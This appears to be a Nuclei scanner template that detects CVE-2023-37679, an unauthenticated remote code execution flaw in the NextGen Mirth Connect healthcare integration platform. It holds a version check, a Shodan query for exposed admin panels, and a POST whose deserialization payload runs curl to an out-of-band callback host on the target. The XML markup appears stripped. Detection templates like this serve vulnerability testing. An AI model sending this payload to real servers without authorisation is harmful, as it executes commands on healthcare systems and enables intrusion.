id: CVE-2023-37679 info: name: NextGen Mirth Connect - Remote Code Execution author: iamnoooob,rootxharsh,pdresearch severity: critical description: | Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability reference: - https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/ - https://nvd.nist.gov/vuln/detail/CVE-2023-37679 - http://mirth.com - http://nextgen.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-37679 cwe-id: CWE-77 epss-score: 0.06338 epss-percentile: 0.92877 cpe: cpe:2.3:a:nextgen:mirth_connect:4.3.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: nextgen product: mirth_connect shodan-query: title:"mirth connect administrator" tags: cve,cve2023,nextgen,rce http: - raw: - | GET /api/server/version HTTP/1.1 Host: {{Hostname}} X-Requested-With: OpenAPI - | POST /api/users HTTP/1.1 Host: {{Hostname}} X-Requested-With: OpenAPI Content-Type: application/xml foo java.lang.Comparable curl http://{{interactsh-url}}/ start matchers: - type: dsl dsl: - 'compare_versions(version, "<4.4.1")' - 'contains(interactsh_protocol, "dns")' - 'status_code_1 == 200 && status_code_2 == 500' condition: and extractors: - type: regex part: body_1 name: version group: 1 regex: - '(.*)' internal: true # digest: 4b0a00483046022100a0c00941f093455de58df4e45bce0f88473cf039647e6a866999835470a73910022100b18fa110f43787e75aefc4f0ae20cea957c290d17151de706cc20a4a1e9d8561:922c64590222798bb761d5b6d8e72950